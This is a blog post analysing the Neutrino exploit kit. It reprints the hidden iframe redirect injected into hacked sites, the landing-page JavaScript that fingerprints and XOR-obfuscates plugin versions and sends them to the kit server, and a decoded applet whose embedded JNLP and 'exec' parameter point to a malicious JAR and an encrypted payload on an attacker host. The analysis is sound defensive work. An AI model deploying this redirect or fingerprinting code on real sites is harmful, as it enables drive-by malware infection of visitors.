Wednesday, January 29, 2014

Analysis - Neutrino Exploit Kit

Neutrino Exploit Kit started appearing in early 2013 and has since been actively used by cyber criminals to install various malwares on the user's machine without the consent on the users (by exploiting various CLIENT-SIDE vulnerabilities). The cyber criminals first finds vulnerable websites and inject their redirection code there. Below is the most commonly seen redirection code.

 <div style="display:none"><iframe src="http://krvqmoxfsdygdihnf.game-host.org:8000/hxpkhwtbgsplmp?gmibgyrwlmv=7112268"></iframe></div>  

This redirects the users to Neutrino Exploit Kit hosted sites. The landing page of the kit looks like below (cleaned up the code - removed unnecessary includes).

 <script src="jquery.min.js"></script>   
    <script type="text/javascript" src="index.js"></script>   
    <script type="text/javascript">   
      $(document).ready(function ()    
        req("5214a385aaa2ccae0921cd32", "nsydaede", "fiai", "snzsbt", "dbigdkbylmtvoydo")   
      });   
      function req(a, b, c, d, e)    
        var l = PluginDetect.getVersion,   
          g = [    
            adobe_reader: "AdobeReader"   
          },    
            java: "Java"   
          },    
            flash: "Flash"   
          },    
            quick_time: "QuickTime"   
          },    
            real_player: "RealPlayer"   
          },    
            shockwave: "Shockwave"   
          },    
            silver_light: "Silverlight"   
          },    
            vlc: "VLC"   
          },    
            wmp: "WMP"   
          }],   
          f = [];   
        f.push("hid:::" + a);   
        for (var h in g)   
          for (var k in g[h]) f.push(k + ":::" + l(g[h][k]));   
        f.push("office:::" + office_ver());   
        a = {};   
        a[d] = c;   
        a[e] = encodeURIComponent(xxxz(f.join(";;;"), c));   
        $.get(b, a, function (a, b)    
          $("body").append(xxxz(decodeURIComponent(a), c))   
        })   
      }   
      function xxxz(a, b)    
        for (var c = "", d = 0, e = 0, d = 0; d < a.length; d++) e = Math.floor(d % b.length), c += String.fromCharCode(a.charCodeAt(d) ^ b.charCodeAt(e));   
        return c   
      }   
      function office_ver()    
        var a = 0,   
          b = 0;   
        try    
          a = new ActiveXObject("SharePoint.OpenDocuments.4")   
        } catch (c) {}   
        try    
          b = new ActiveXObject("SharePoint.OpenDocuments.3")   
        } catch (d) {}   
        return "object" == typeof a &amp;&amp; "object" == typeof b ? "2010" : "number" == typeof a &amp;&amp; "object" == typeof b ? "2007" : null   
      };   
    </script>   

This code is responsible for harvesting and sending details of the plugins installed in the browser. When the intalled plugins are harvested it OBFUSCATES the details sends it to the Neutrino Exploit Kit server. In the details that's sent, it also includes a unique HID (which can be found in the landing page - in this case "5214a385aaa2ccae0921cd32"). Below is the non-obfuscated version of the details sent.

 Non-Obfuscated "hid:::5214a385aaa2ccae0921cd32;;;adobe_reader:::7,1,0,0;;;java:::1,7,0,10;;;flash:::11,4,402,265;;;quick_time:::null;;;real_player:::null;;;shockwave:::null;;;silver_light:::null;;;vlc:::null;;;wmp:::null;;;office:::null"   

From the above the plugin installed along with the version is clearly visible.

 Obfuscated - The plugin details that's sent via POST request to the server  
 
 POST /nsydaede HTTP/1.1  
 x-requested-with: XMLHttpRequest
 Accept-Language: en-us
 Referer: http://sittoojimmvsftgcvuun.game-host.org:8000/hgvorbxobh?gkbiubmxbydx=8270053
 Accept: */*  
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
 &nbsp;Accept-Encoding: gzip, deflate  
 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)  
 Host: sittoojimmvsftgcvuun.game-host.org:8000  
 Content-Length: 837  
 Connection: Keep-Alive  
 Pragma: no-cache  
   
 snzsbt=fiai&dbigdkbylmtvoydo=%250E%2500%2505S%255CST%255BW%255D%2500Z%255E%255C%2500%2508%2507%255B%2502%250A%2507%250CQPTX%2502%250DU%255BZR%255D%2508%2505%2506%2504%250C%253E%251B%2503%2508%2505%250C%2514S%255BSQEPEVEQR%255DR%250B%2508%2510%2508%255BS%255CXM%255EJYMXVRZR%2500%2505%2500%251A%250ES%255BSWXM%255DJ%255DQ%255BJ%255BW%255C%255DRZ%2518%2513%2500%2502%25029%251D%2508%2504%2503S%255BS%2508%251C%250D%2505%255DRZ%251B%2503%2508%250D6%2516%2505%2500%2510%2503%251B%255BS%255C%2507%2514%2505%250ARZR%2515%2501%250E%250A%250D%251E%2500%251F%2503S%255BS%2508%251C%250D%2505%255DRZ%251A%250F%2505%2517%250C%25146%250D%2500%2501%2501%2515S%255CS%250F%251C%250A%2505ZR%255D%251F%250D%250A%255CS%255B%2507%2513%2505%250DR%255DR%2516%2504%2516S%255BS%2508%251C%250D%2505%255DRZ%2506%2500%250F%2508%250A%2503S%255BS%2508%251C%250D%2505 

The response to this POST request also has an obfuscated SCRIPT. The response looks like below.

 Z%08%11%19%0A%0C%15Wl%60h%60o%60hU%16%08%13%08%0BI%0F%08%0B%0C%5CN%0C%07%0D%199%01%13%0C  
 NA%1F%07%05%14%0C%5BN%20%05%12G%0B%07%0A%19FWl%60h%60o%60hU%16%08%13%08%0BI%0F%08%0B%0C%5CN  
 %0C%07%0D%199%0C%0C%0B%03%0D%05%0C%02NA%1F%07%05%14%0C%5BN1-_%5D%03%3E%11%0E%05%040%10%02%5  
 B%0A%1F%03%03V%2C%3AR%1E%28%24%05%03%04%28%1F%3B.%0A%1C%3B%13V%0514%04-%3D%011%  
 13R%22%228%0D%23%228%0DQ%04S%1A%02%2A%24%06%02%040%041%3A%2C%2B%03%217%1C%04S%1A%02%2  
 A%2F%0E%02Z%24%058%13V%2C%3AR%1E%28%24%5D%03%3E%1E%1C%02%13%16%18%3B%07%01P%28%04%0EY  
 %05%21%27_-%10_%1881%3C%01%3B%07%01%1C8%5B_%1D%28%03R%22%228%0D%23%228%0D%231.%0A%1C%3B%04_  
 %10%03%3E%20Y%3E_%1C1%0E%09%23%228%0D%23%228%0D%231%214%19%05.%1E%051%02%20%1E%02.%1E%05  
 %05-%11%1F%05.%0AY%03.3B%22%0E%0D%23%228%0D%23%228%0DQ%05%040%1C%3B._%101%02_%108%3E%28%1A%  
 3B%3D%11%1F%05%040%1C%3B._%101%0E%09%23%228%0D%23%228%0DQ-%5B%0A%1C%3B%04_%10%03%3E%20Y%  
 3E_%1C1%0E%09%23%228%0D%23%228%0DQ%02%040%13%03Z0%108%5B0%131%0E%09%23%228%0D%23%228%0D%231  
 .%09%10%02%5B3%0E%21%2C%05%3B%03V%214Y%02-%09%1F-%5B%16%01%05%04%23%1C%02Z0%1C-%04  
 %28%1F%03%3A_%1E%02%04_%02%05%3E%28Y%02%10_%01%0514%1F%3B.%11%1F%03%2C%13%3B%3A%2F%0E%05  
 %040%10%02%5B%0A%1F%03%03V%2C%3ARZ%2A%10%2F%0E-%13R%22%228%0D%23%228%0D%23%22%3D%1E%1881  
 %2F%0E%21%2C%05%3B%03V%214Y%02-%09%1F-Z%28%19%05%214%1F%03%5B%16%19%03%3EW%5B%02%5  
 B%3CY%3B%5B%28%5B%0510%1C-%04%02%01%03%3E3%1D._%13%05%2AS%1F%02%04%05_.-%27%1E%2C%2A_%05  
 %3B1%2C%03%3B%21%20%5C%05%3E%28%1F%3B%3E%20%1D%04%3D_%5C8%3E0%04%040_%02.7PZ4_%021%16  
 %19%02%04%15%28.W%01%3ERP%28%074%10%05%3E3%28%2A%5EB%22%0E%0D%23%228%0D%23%22%3D%1  
 1%1F%02%040%13%03Z0%108%5B0%131%0E%09%23%228%0D%23%228%0DQ81%24%1E%03.0Y-%3E4%05%02%5B%2B%0  
 E%03%3E%20%19%03W%03%03.%20%13%02%13V0%3E%1EY%28%24%1C8%3EW%051%3A%2C%2B%02%21%24%  
 1A%3B17%28%21%02%19%3B%214%061%3A%2F%11%2C%2A%2F%0E.0%19%3B%5B%0EY1%3A%2F%11%2C%2A%2F  
 B%22%0E%0D%23%228%0D%23%228%0DQ%02.%20%108%3EV%0E%03%04%20%1D%3B%3DV9X_%01%02%21%24%1A%3  
 B14%0F%02Z%28%5B9Z%3C%01%03.%0A%02814%05%3B%2A%2F%0E%05%04%20%1A%05%3E3P%28%074%10%05%3E3%0  
 0%28%2A%5EB%22%0E%0D%23%228%0D%23%22%3D%1E%1E81%2C%01%03%3A%24%1C8%3EW%051%3A%2C%05%04.0%03  
 %28%24%5B8%3E%1EX%3B%3DV8%3C%0E%3A%2C.%28%2C%03Z%3C%24%2CYS%1E%3B%2C%0E%3A%05%04%2F%1  
 0%02%21%247%13%23%108%13%2C%08%2C%2F%09%105%03%2C%026%2F%3CX5.W%02.%2C1714%013%13%0A_  
 %3B%2C%2BX%05%04%28%1D8%13%3C93%2C%20Z5%3C%2B%5C%2F%05%0D%10%2C%3E%1E%03%03%3CS%5D8%5BW.%2C  
 %3E%2014%0308%2C%5B%1E%19%3B%2C%02%22%04.015%04%12%02%2CY%16%1B6%3E%09%11%02%044%20%02%21%0  
 E%05%03%3E%1E%5C81%05P1%3A%2F%0E-%13R%22%228%0D%23%228%0D%231%21%24%01%02%04%20%1D%28.S%01%  
 03%3E3P%28%07%0E%1B%3B1%0D%28%21%3C%01%03%210%051%3A%2C%1C%04%0A%1A%28%27%1F1%0E%0  
 9%23%228%0D%23%228%0DQ-%5B%20%1E%02.%1E%05%05%2AW%02%3B1%28%031%0E%09%23%228%0D%23%22%3D%11  
 %1F%04S%1A%02-RTFWl%60h%60o%60%5DF%07%19%11%05%03%1D_  

The script is de-obfuscated using the function "xxxz", the response of the POST request is taken and fed to the function which in turn returns readable script which looks like below.

  <applet>   
  <param name='jnlp_href' value='Alt.jnlp'>   
  <param name='jnlp_embedded' value='PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4KCQkJCQk8am5scCBocmVmPSJBbHQuam5scCI   
  gc3BlYz0iMS4wIiB4bWxuczpqZng9Imh0dHA6Ly9qYXZhZnguY29tIj4KCQkJCQkJPGluZm9ybWF0aW9uPgoJCQkJCQkJP   
  HRpdGxlPkFwcGxldDwvdGl0bGU+CgkJCQkJCQk8dmVuZG9yPk9yYWNsZTwvdmVuZG9yPgoJCQkJCQk8L2luZm9ybWF0aW9   
  uPgoJCQkJCQk8cmVzb3VyY2VzPgoJCQkJCQkJPGoyc2UgaHJlZj0iaHR0cDovL2phdmEuc3VuLmNvbS9wcm9kdWN0cy9hd   
  XRvZGwvajJzZSIgdmVyc2lvbj0iMS43KyIgLz4KCQkJCQkJCTxqYXIgaHJlZj0iaHR0cDovL3NpdHRvb2ppbW12c2Z0Z2N   
  2dXVuLmdhbWUtaG9zdC5vcmc6ODAwMC9lZXJjZHF5dWNvZWFteT95YWVmamV6cGQ9a3R6cXppcmsiIG1haW49InRydWUiI   
  C8+CgkJCQkJCTwvcmVzb3VyY2VzPgoJCQkJCQk8YXBwbGV0LWRlc2MgbWFpbi1jbGFzcz0iQWx0IiBuYW1lPSJBcHBsZXQ   
  iIHdpZHRoPSIxMCIgaGVpZ2h0PSIxMCI+CgkJCQkJCQk8cGFyYW0gbmFtZT0iX19hcHBsZXRfc3N2X3ZhbGlkYXRlZCIgd   
  mFsdWU9InRydWUiIC8+CgkJCQkJCTxwYXJhbSBuYW1lPSJleGVjIiB2YWx1ZT0iYUhSMGNEb3ZMM05wZEhSdmIycHBiVzE   
  yYzJaMFoyTjJkWFZ1TG1kaGJXVXRhRzl6ZEM1dmNtYzZPREF3TUM5NlkyMWxjbU54Y21GMWFXUjVQM2xpZEdKeGVXTmtkM   
  0prWWoxcmRIcHhlbWx5YXc9PSIgLz4KCQkJCQkJPHBhcmFtIG5hbWU9InhrZXkiIHZhbHVlPSJuamlsIiAvPgoJCQkJCQk   
  8L2FwcGxldC1kZXNjPgoJCQkJCTwvam5scD4='>   
  </applet>   

Decoding the BASE64 code and it reveals the embedded APPLET that calls the JAVA exploit.

 <applet>   
  <param name="jnlp_href" value="Alt.jnlp" />   
  <param name="jnlp_embedded" value="PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4KCQkJCQk8am5scCBocmVmPSJBbHQuam5scCI &lt;br&gt; gc3BlYz0iMS4wIiB4bWxuczpqZng9Imh0dHA6Ly9qYXZhZnguY29tIj4KCQkJCQkJPGluZm9ybWF0aW9uPgoJCQkJCQkJP &lt;br&gt; HRpdGxlPkFwcGxldDwvdGl0bGU+CgkJCQkJCQk8dmVuZG9yPk9yYWNsZTwvdmVuZG9yPgoJCQkJCQk8L2luZm9ybWF0aW9 &lt;br&gt; uPgoJCQkJCQk8cmVzb3VyY2VzPgoJCQkJCQkJPGoyc2UgaHJlZj0iaHR0cDovL2phdmEuc3VuLmNvbS9wcm9kdWN0cy9hd &lt;br&gt; XRvZGwvajJzZSIgdmVyc2lvbj0iMS43KyIgLz4KCQkJCQkJCTxqYXIgaHJlZj0iaHR0cDovL3NpdHRvb2ppbW12c2Z0Z2N &lt;br&gt; 2dXVuLmdhbWUtaG9zdC5vcmc6ODAwMC9lZXJjZHF5dWNvZWFteT95YWVmamV6cGQ9a3R6cXppcmsiIG1haW49InRydWUiI &lt;br&gt; C8+CgkJCQkJCTwvcmVzb3VyY2VzPgoJCQkJCQk8YXBwbGV0LWRlc2MgbWFpbi1jbGFzcz0iQWx0IiBuYW1lPSJBcHBsZXQ &lt;br&gt; iIHdpZHRoPSIxMCIgaGVpZ2h0PSIxMCI+CgkJCQkJCQk8cGFyYW0gbmFtZT0iX19hcHBsZXRfc3N2X3ZhbGlkYXRlZCIgd &lt;br&gt; mFsdWU9InRydWUiIC8+CgkJCQkJCTxwYXJhbSBuYW1lPSJleGVjIiB2YWx1ZT0iYUhSMGNEb3ZMM05wZEhSdmIycHBiVzE &lt;br&gt; yYzJaMFoyTjJkWFZ1TG1kaGJXVXRhRzl6ZEM1dmNtYzZPREF3TUM5NlkyMWxjbU54Y21GMWFXUjVQM2xpZEdKeGVXTmtkM &lt;br&gt; 0prWWoxcmRIcHhlbWx5YXc9PSIgLz4KCQkJCQkJPHBhcmFtIG5hbWU9InhrZXkiIHZhbHVlPSJuamlsIiAvPgoJCQkJCQk &lt;br&gt; 8L2FwcGxldC1kZXNjPgoJCQkJCTwvam5scD4=" />   
  </applet>  

When the JAR gets downloaded it exploits the JAVA vulnerability (currently Neutrino serves CVE-2013-2465 as of writing), downloads the malware and executes it. The JAR fetches certain parameters from the PARAMETERS passed through applet tag for decrypting the binary (the final payload that's downloaded by Neutrino is encrypted). The decryption starts with fetching the PARAMETERS first, below JAVA code is responsible for it.

 String str = getParameter("7383568568e464564568465656x568458456845684568e65468456856  
 84568c45845684878467864757584".replaceAll("[0-9]", ""));  
  byte[] arrayOfByte = getParameter("357868538x456845685368363865754767638967895738565437568568k65835683568335683456836e5658356856865856356y65548548685454".replaceAll("[0-9]", "")).getBytes("ISO_8859_1");  
  drp.dx(str, arrayOfByte);  

Decoding it we can see that it fetches the PARAM "exec" and "xkey". "exec" PARAM has the URL to the encrypted EXE file (in this case "aHR0cDovL3NpdHRvb2ppbW12c2Z0Z2N2dXVuLmdhbWUtaG9zdC5vcmc6ODAwMC96Y21lcmNxcmF1aWR5P3lidGJxeWNkd3JkYj1rdHpxemlyaw==" - base64 decode results in hxxp://sittoojimmvsftgcvuun[.]game-host[.]org:8000/zcmercqrauidy?ybtbqycdwrdb=ktzqzirk) and xkey is the key for decrypting the payload (in this case - "njil"). Below's how the payload will look in wireshark (encrypted).


Using Data-Converter from KahuSecurity the encrypted binary can be easily decrypted. 


No comments:

Post a Comment